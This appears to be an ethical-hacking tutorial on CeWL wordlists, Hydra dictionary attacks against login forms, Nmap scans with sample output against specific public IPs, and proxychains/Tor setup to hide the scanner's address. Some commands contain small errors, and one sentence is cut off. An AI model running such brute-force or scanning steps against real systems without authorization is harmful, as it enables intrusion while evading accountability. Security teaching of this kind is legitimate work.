Once enumeration is done the ethical hacker can look forward to trying to get the credentials of the admins. There are many ways to do this and get the password by dictionary attacks, phishing, sql injections, eavesdropping, malware and plenty more. Today we will focus on a dictionary attack using Hydra.

A dictionary attack is a form of brute force attack technique for getting through a authentication mechanism via thousands or millions of likely possibilities of usernames and password combinations. Additionally these combinations of passwords and usernames have most likely been extracted from previous data breaches so they have some legitimacy to them. The only way this method works though is because people use short or weak passwords. Nowadays your browser and your phone have provided features to generate safe passwords and store them to make sure

CEWL – is a ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper, Hydra, etc. Basically you can make your own personalized dictionaries from a given target’s website.

Hydra– is a parallelized network login cracker built in various operating systems like Kali Linux, Parrot and other major penetration testing environments. Hydra works by using different approaches to perform brute-force attacks in order to find the right username and password combination

Implementation- Once you have generated a list of passwords with CEWL or wherever source you choose from, you can start using Hydra. It is important to note a username needs to be provided also and is usually much easier to get than the password as it can be visible most of the times to outsiders and can also be the email associated to the username. These can all be found by the enumeration steps we covered previously.

the example.com is the web domain that you have to provide to hydra. Next is the -L flag that takes in the list of emails file or usernames file as the parameter. The -P flag takes in the parameter of the list of passwords file. The http-post-form is a way to specify how the username and passwords will be submitted via post method in this case. Next is specifying the route for where the post method will be sent to in this case is “/login.php” and we are adding information to the route by providing variables like email and password. This email and password variables are set equal to emails.txt and passwords.txt in that order respectively. Lastly Invalid password is the message we will get if all the combinations are incorrect.

If done correctly Hydra will perform a dictionary attack and attempt to login with all the combinations possible in the dictionaries.

Port Scanning can be done with many tools, today we will be looking at NMAP (Network Mapper) which is a free and open source tool for vulnerability scanning and network discovery. This is commonly used to identify what devices are running on a system and discovering hosts that are available. Along with host information we can also see what services they offer. We can also find open ports and discover security risks. NMAP also offers ping scans and scans to detect the operating system. It has been evolving over the years.

NMAP works by sending packets that make communication via transport layer protocols like TCP, UDP, SCTP, and ICMP. These protocols serve different purposes and are used for different system ports. NMAP also uses banner grabbing which is a technique to gain information about a computer system on a network and the services running on the ports. However some systems may provide filtering and closing of their ports to stay protected. Additionally open ports mostly have firewalls protecting them setup by their administrator. Additionally filtering is the process of filtering the packets sent to the port denying the NMAP probes from ever reaching their destination.

TCP Message Types – These are the messages you will receive when monitoring a TCP connection, also known as a three way handshake.

Examples of Port Scanning with Nmap

Ping Scan

$ proxychain nmap -sn 40.90.170.115/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-14 13:34 EDT
Nmap done: 256 IP addresses (33 hosts up) scanned in 7.30 seconds

Port Scan                                                       

$ proxychain nmap 40.90.170.141 -p1-65535
Not shown: 65534 filtered ports
PORT    STATE SERVICE
443/tcp open  https

Services Scan

$ proxychain nmap -vv -dd 40.90.170.141

Proxy Chains and TOR

One key thing to know before performing port scans is to stay anonymous and mask your IP Address. This is because when doing a port scan most systems have firewalls that detect your scans and can easily find your information. The solution to this is a proxy which is a intermediary machine whose IP address will be detected rather than your own machine. By connecting to the internet through proxies your connection is more private and anonymous.

TOR is a free and open source software for anonymous communication by directing internet traffic through a worldwide network in order to conceal a user’s location. Without TOR your computer makes a direct TCP connection with the websites server you are browsing and from the web server your IP address can easily be detected. However with TOR the service sends your data through multiple nodes and never makes direct access with the web server. The exit node would finally be responsible for contacting with the webserver and it would be very tricky to tracing your IP Address.

Setup and Installation

First check if proxychains is already installed by running ($sudo apt install proxychains). If this says 0 packages installed then your already have it in your computer. Then we will have to navigate to the directory with the config file of proxychains. This can be found in this directory (/etc/proxychains.conf). You can also use the locate command to find the config file however if proxychains is installed the config file has to be somewhere in your system.

Next we will open the proxychains.conf file with VIM or Nano. Whichever you prefer. ($sudo vim proxychains.conf). Then we will press i to go into insert mode and change some things inside to config file. First we will uncomment dynamic chain (remove #) and then scroll down to the proxy list section at the bottom. We will add this code to the proxy list. (socks4 127.0.0.1 9050) and (socks5 127.0.0.1 9050). After that we will we press escape and do (:wq) to write/save and quit the file.

Next check if you have tor installed on your computer by the same process above. ($sudo apt install tor). Once installed on your computer you can run the tor service via this command ($service tor start) and check if the status is active by ($service tor status). Then press ctrl-z to exit the prompt but keep the service running. Ctrl-c would exit the prompt too but terminate the service. Finally run ($proxychains firefox google.com) and check your IP Address and see if your real IP is masked. If it is then you are successfully using proxychains!